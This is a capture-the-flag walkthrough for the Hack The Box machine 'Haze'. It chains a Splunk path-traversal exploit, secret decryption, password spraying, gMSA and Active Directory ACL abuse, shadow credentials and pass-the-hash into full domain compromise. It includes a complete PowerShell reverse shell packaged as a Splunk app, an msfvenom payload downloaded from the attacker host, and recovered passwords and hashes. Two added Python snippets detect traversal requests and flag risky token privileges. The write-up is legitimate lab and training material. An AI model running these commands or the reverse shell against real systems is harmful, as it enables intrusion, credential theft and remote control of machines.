https://app.hackthebox.com/machines/Haze
10.10.11.61
haze.htb dc01.haze.htb
Nmap Results
Splunk CVE-2024-36991
A Splunk Service is Running on http://haze.htb:8000
We found an exploit for CVE-2024-36991
Clone the repo
git clone https://github.com/bigb0x/CVE-2024-36991.git
Start the Exploit
python3 CVE-2024-36991.py -u http://haze.htb:8000
Try to crack the hashes
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
The hashes are not crackable ❌
Path Traversal Vulnerability
We look up the location of the authentication.conf file
Reading Splunk Configuration via Path Traversal Vulnerability
curl -s "http://haze.htb:8000/en-US/modules/messaging/C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../C:/Program%20Files/Splunk/etc/system/local/authentication.conf"
We found the username paul.taylor and an encrypted password
Splunksecrets
Cloning the Splunk Secrets Extraction Tool
git clone https://github.com/HurricaneLabs/splunksecrets.git
Important
These commands set up a Python virtual environment and install the splunksecrets tool. This isolated environment ensures dependencies are managed cleanly. The tool is now ready to be used for decrypting sensitive data found in Splunk’s configuration files, aiding in credential extraction and privilege escalation tasks.
Exfiltrating the Splunk Secret Key via Path Traversal
curl -s "http://haze.htb:8000/en-US/modules/messaging/C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../C:/Program%20Files/Splunk/etc/auth/splunk.secret"
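The two traversal requests above share one signature: repeated drive-prefixed C:.. segments in the request path. As an added example that is not part of the original writeup, the following detector URL-decodes each request path from constructed access-log lines (the log layout is assumed, not Splunk's exact one) and flags traversal segments, whether plain, drive-prefixed, or double-encoded:

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (common-log-format style is assumed here;
# the real Splunk web access log layout may differ). Two requests carry traversal.
SAMPLE_LOG = """\
10.10.16.7 - - [07/Mar/2025:12:01:03 +0000] "GET /en-US/account/login HTTP/1.1" 200 5123
10.10.16.7 - - [07/Mar/2025:12:01:09 +0000] "GET /en-US/modules/messaging/C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../C:/Program%20Files/Splunk/etc/system/local/authentication.conf HTTP/1.1" 200 812
10.10.16.7 - - [07/Mar/2025:12:01:15 +0000] "GET /en-US/modules/messaging/..%2f..%2f..%2fetc/auth/splunk.secret HTTP/1.1" 200 254
10.10.16.7 - - [07/Mar/2025:12:02:00 +0000] "GET /en-US/static/app/search/app.css HTTP/1.1" 200 9001
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+"')
# One traversal segment: "..", optionally prefixed by a drive letter and colon
# ("C:.."), which is the form used in the requests above.
TRAVERSAL_SEG_RE = re.compile(r'(?:^|/)(?:[A-Za-z]:)?\.\.(?:/|$)')


def is_traversal(path: str) -> bool:
    """True if the (possibly double-encoded) request path contains a traversal segment."""
    decoded = unquote(unquote(path))  # second pass catches %252e%252e
    return bool(TRAVERSAL_SEG_RE.search(decoded))


def find_traversal_requests(log_text: str) -> list:
    """Return (method, decoded_path) for every request line that traverses."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        path = m.group("path").split("?", 1)[0]  # ignore the query string
        if is_traversal(path):
            hits.append((m.group("method"), unquote(unquote(path))))
    return hits


if __name__ == "__main__":
    for method, path in find_traversal_requests(SAMPLE_LOG):
        print(f"traversal: {method} {path}")
```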
We write the Splunk secret key to splunk.secret
echo 'NfKeJCdFGKUQUqyQmnX/WM9xMn5uVF32qyiofYPHkEOGcpMsEN.lRPooJnBdEL5Gh2wm12jKEytQoxsAYA5mReU9.h0SYEwpFMDyyAuTqhnba9P2Kul0dyBizLpq6Nq5qiCTBK3UM516vzArIkZvWQLk3Bqm1YylhEfdUvaw1ngVqR1oRtg54qf4jG0X16hNDhXokoyvgb44lWcH33FrMXxMvzFKd5W3TaAUisO6rnN0xqB7cHbofaA1YV9vgD' > splunk.secret
Setting Up and Installing the SplunkSecrets Python Environment
cd splunksecrets
python3 -m venv venv
source venv/bin/activate
pip3 install splunksecrets
Decrypting Splunk Credentials Using the Master Secret
splunksecrets splunk-decrypt -S splunk.secret
When prompted, paste the encrypted password value from authentication.conf to complete the decryption
We recovered the password Ld@p_Auth_Sp1unk@2k24
User Enumeration
Brute-Forcing SMB RIDs to Enumerate Domain Users
nxc smb haze.htb -u 'paul.taylor' -p 'Ld@p_Auth_Sp1unk@2k24' --rid-brute | grep "SidTypeUser" | awk -F '\\\\' '{print $2}' | awk '{print $1}' > users.txt
Validating WinRM Access for Enumerated Users
crackmapexec winrm 10.10.11.61 -u users.txt -p 'Ld@p_Auth_Sp1unk@2k24' -d haze.htb
We found that the password also works for the user mark.adams
Exploit Chain
Info
Attack Summary: Shadow Credentials to SYSTEM Access via Kerberos and WinRM
The attack begins by using a valid domain user (mark.adams) to enumerate a gMSA (Haze-IT-Backup$) and grant it rights to read its own password. With the dumped gMSA hash, a TGT is requested using getTGT.py. Using this ticket, the attacker leverages bloodyAD to:
1. Take ownership of the SUPPORT_SERVICES user object,
2. Grant GenericAll rights to it,
3. Add Haze-IT-Backup$ as a group member, and
4. Inject shadow credentials into the user edward.martin.
Then, a forged certificate is created and converted into a .pfx file, which is used with certipy to authenticate as edward.martin. Finally, a Pass-the-Hash attack via evil-winrm spawns a remote shell — completing a full domain privilege escalation chain via Kerberos abuse, object ACL manipulation, and shadow credentials.
Establishing a WinRM Shell with Evil-WinRM
evil-winrm -u 'mark.adams' -p 'Ld@p_Auth_Sp1unk@2k24' -i haze.htb
Identifying gMSA Access Control: Domain Admins Can Read the Secret
gMSADumper.py -u mark.adams -p 'Ld@p_Auth_Sp1unk@2k24' -d haze.htb -l dc01.haze.htb
Modifying gMSA Permissions to Retrieve the Managed Password
Set-ADServiceAccount -Identity Haze-IT-Backup$ -PrincipalsAllowedToRetrieveManagedPassword "mark.adams"
Question
This PowerShell command uses Set-ADServiceAccount to modify the PrincipalsAllowedToRetrieveManagedPassword property of the gMSA account Haze-IT-Backup$, allowing the user mark.adams to retrieve its managed password.
If successful, this grants mark.adams access to decrypt the gMSA's password using tools like gMSADumper.py, which can then be used for lateral movement or privilege escalation — especially if the gMSA is tied to a privileged service or system.
Dumping gMSA Password After Modifying Access Control
gMSADumper.py -u mark.adams -p 'Ld@p_Auth_Sp1unk@2k24' -d haze.htb -l haze.htb
Bloodhound
"We have WriteOwner permissions, so we can change the ownership of the SUPPORT_SERVICES object to the user Haze-IT-Backup$."
Synchronizing Local Time with Domain Controller via ntpdate
ntpdate haze.htb
Requesting a TGT Using a gMSA Account Hash with getTGT.py
getTGT.py haze.htb/Haze-IT-Backup$ -hashes ':4de830d1d58c14e241aff55f82ecdba1'
Setting the Kerberos Ticket Environment for Authentication
export KRB5CCNAME=Haze-IT-Backup$.ccache
Taking Ownership of an AD Object via bloodyAD with Kerberos Authentication
bloodyAD --host "dc01.haze.htb" -d "haze.htb" -u $'Haze-IT-Backup$' -k set owner "SUPPORT_SERVICES" $'Haze-IT-Backup$'
Granting GenericAll Rights on an AD Object via Kerberos with bloodyAD
bloodyAD --host "dc01.haze.htb" -d "haze.htb" -u 'Haze-IT-Backup$' -k add genericAll "CN=SUPPORT_SERVICES,CN=Users,DC=haze,DC=htb" 'Haze-IT-Backup$'
Adding gMSA to AD Group via Kerberos with bloodyAD
bloodyAD --host "dc01.haze.htb" -d "haze.htb" -u 'Haze-IT-Backup$' -k add groupMember "SUPPORT_SERVICES" 'Haze-IT-Backup$'
Injecting Shadow Credentials for Persistence via bloodyAD
bloodyAD --host "dc01.haze.htb" -d "haze.htb" -u 'Haze-IT-Backup$' -p ':4de830d1d58c14e241aff55f82ecdba1' add shadowCredentials "edward.martin"
Creating a PFX Certificate Bundle for Shadow Credentials and set a Password
openssl pkcs12 -export -out ikun.pfx -inkey Lyg8EEtA_priv.pem -in Lyg8EEtA_cert.pem
Note
🔁 Note: The filename ikun.pfx is arbitrary and can be renamed. Each time you generate a new key/certificate pair (e.g., with a different CN or username), you may want to give the .pfx file a unique name to reflect the target user or purpose — for example: edward.pfx, svc_backup.pfx, etc.
Authenticating as a Shadow Credentials Target Using Certipy and a PFX File
certipy-ad auth -pfx ikun.pfx -password 'pa$$w0rd' -u 'edward.martin' -domain haze.htb -dc-ip 10.10.11.61
Gaining Remote Access via Evil-WinRM with NTLM Hash Authentication
evil-winrm -i 10.10.11.61 -u edward.martin -H 09e0b3eeb2e7a6b0d419e9ff8f4d91af
User Flag 🏁
Grab the User Flag
type C:\Users\edward.martin\Desktop\user.txt
Privesc
Navigating to the Splunk Backups Directory on the Target System
cd C:\Backups\Splunk
Download the Backup File via evil-winrm
download 'splunk_backup_2024-08-06.zip'
Extracting a Splunk Backup Archive on our Machine
unzip splunk_backup_2024-08-06.zip
We found a splunk.secret file in the backup files
cat Splunk/etc/auth/splunk.secret
We put the secret in splunk.secret2
We found a salted password in the backup files
cat Splunk/var/run/splunk/confsnapshot/baseline_local/system/local/authentication.conf
Decrypting Splunk Secrets Using an Alternate Master Key
splunksecrets splunk-decrypt -S splunk.secret2
We recovered the password Sp1unkadmin@2k24
Splunk Reverse Shell
We open http://haze.htb:8000
We log in as the admin user with the recovered password Sp1unkadmin@2k24
At this stage we can upload a reverse shell through the Splunk interface
Cloning a Reverse Shell Injection Tool for Splunk
git clone https://github.com/0xjpuff/reverse_shell_splunk
Note
Go to the folder reverse_shell_splunk/reverse_shell_splunk/bin and put your tun0 IP in run.ps1 and rev.py
Important
We need to replace the reverse shell in run.ps1; the original one does not work on haze.htb
run.ps1
$client = New-Object System.Net.Sockets.TCPClient('10.10.16.7', 4444)
$stream = $client.GetStream()
[byte[]]$bytes = 0..65535 | % {0}
while (($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) {
$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes, 0, $i)
$sendback = (iex $data 2>&1 | Out-String)
$sendback2 = $sendback + 'PS ' + (pwd).Path + '> '
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
$stream.Write($sendbyte, 0, $sendbyte.Length)
$stream.Flush()
}
$client.Close()
Packaging the Reverse Shell Splunk App into a TGZ Archive
tar -cvzf reverse_shell_splunk.tgz reverse_shell_splunk
Renaming the Payload Archive to a Splunk App Format
mv reverse_shell_splunk.tgz reverse_shell_splunk.spl
This gives us the file reverse_shell_splunk.spl
We upload this file to http://haze.htb:8000/
First we open a netcat listener to catch the reverse shell
nc -lvnp 4444
In the Splunk application we go to http://haze.htb:8000/en-US/manager/appinstall/_upload?breadcrumbs=Settings%7C%2Fmanager%2Fsearch%2F%09Apps%7C%2Fmanager%2Fsearch%2Fapps%2Flocal
We got a reverse shell as the user alexander.green
We check our privileges
whoami /priv
Generating a Windows x64 Meterpreter Reverse Shell with msfvenom
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.16.7 LPORT=5555 -f exe -o shell.exe
Starting a Meterpreter Listener in Metasploit for Reverse Shell Sessions
msfconsole -x "use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set LHOST 10.10.16.7; set LPORT 5555; run"
Hosting shell.exe with a Simple Python HTTP Server
python3 -m http.server 80
Downloading the Payload shell.exe to the Target via PowerShell
iwr http://10.10.16.7/shell.exe -OutFile C:\Users\Public\shell.exe
Navigating to the Windows Public Directory
cd C:\Users\Public\
Trigger the Meterpreter Shell
./shell.exe
We upgrade the Meterpreter shell to NT AUTHORITY\SYSTEM rights
Question
Why SeImpersonatePrivilege Allows Elevation to SYSTEM via Meterpreter's getprivs
SeImpersonatePrivilege is a powerful Windows privilege that allows a process to impersonate the security context of another
user — often used in legitimate service operations. However, when misused by an attacker, it enables privilege escalation to
SYSTEM, even if you're not a local admin.
✅ Why It Succeeds
SeImpersonatePrivilege lets you "borrow" SYSTEM's identity if you can trick a SYSTEM process into talking to you.
You don’t need to be an administrator — just a user with this one privilege.
🚀 Common Exploit Technique: Token Impersonation via Named Pipes
Tools like Juicy Potato, Rogue Potato, or PrintSpoofer abuse SeImpersonatePrivilege by:
1. Triggering a service or COM object running as SYSTEM that connects back to a named pipe controlled by the attacker.
2. Once the SYSTEM process connects, the attacker impersonates its token.
3. The process (e.g., Meterpreter) now acts as SYSTEM.
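Added example, not part of the original writeup: a triage parser for the whoami /priv output checked earlier, which reports every held privilege that falls into the high-risk set discussed above. The sample output is constructed, not captured from the box. Privileges listed as Disabled are reported too, because a disabled privilege is still present in the token and the process can enable it itself with AdjustTokenPrivileges.

```python
import re

# Constructed sample output of `whoami /priv` for a low-privileged service
# context like the Splunk one in this writeup (illustrative, not captured).
SAMPLE_WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
"""

# Token privileges that let a non-admin reach SYSTEM-equivalent access,
# with a short note on what each one grants.
HIGH_RISK = {
    "SeImpersonatePrivilege": "impersonate a SYSTEM client token (Potato-family, PrintSpoofer)",
    "SeAssignPrimaryTokenPrivilege": "start a process under another token",
    "SeDebugPrivilege": "open any process, including SYSTEM ones",
    "SeBackupPrivilege": "read any file regardless of ACL",
    "SeRestorePrivilege": "write any file or registry key regardless of ACL",
    "SeTakeOwnershipPrivilege": "take ownership of any securable object",
    "SeLoadDriverPrivilege": "load a kernel driver",
}

# A privilege row: name, free-text description, then the State column.
PRIV_LINE_RE = re.compile(r"^(Se\w+Privilege)\s+.*?\s+(Enabled|Disabled)\s*$")


def parse_privileges(output: str) -> dict:
    """Map privilege name -> state ('Enabled'/'Disabled') from whoami /priv text."""
    privs = {}
    for line in output.splitlines():
        m = PRIV_LINE_RE.match(line.strip())
        if m:
            privs[m.group(1)] = m.group(2)
    return privs


def high_risk_privileges(output: str) -> list:
    """Return (name, state, note) for each held high-risk privilege, in token order.
    Disabled entries are kept: the holder can enable them without any extra rights."""
    privs = parse_privileges(output)
    return [(name, state, HIGH_RISK[name]) for name, state in privs.items() if name in HIGH_RISK]
```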
Root Flag 🏁💪
We read the root flag
type C:\Users\Administrator\Desktop\root.txt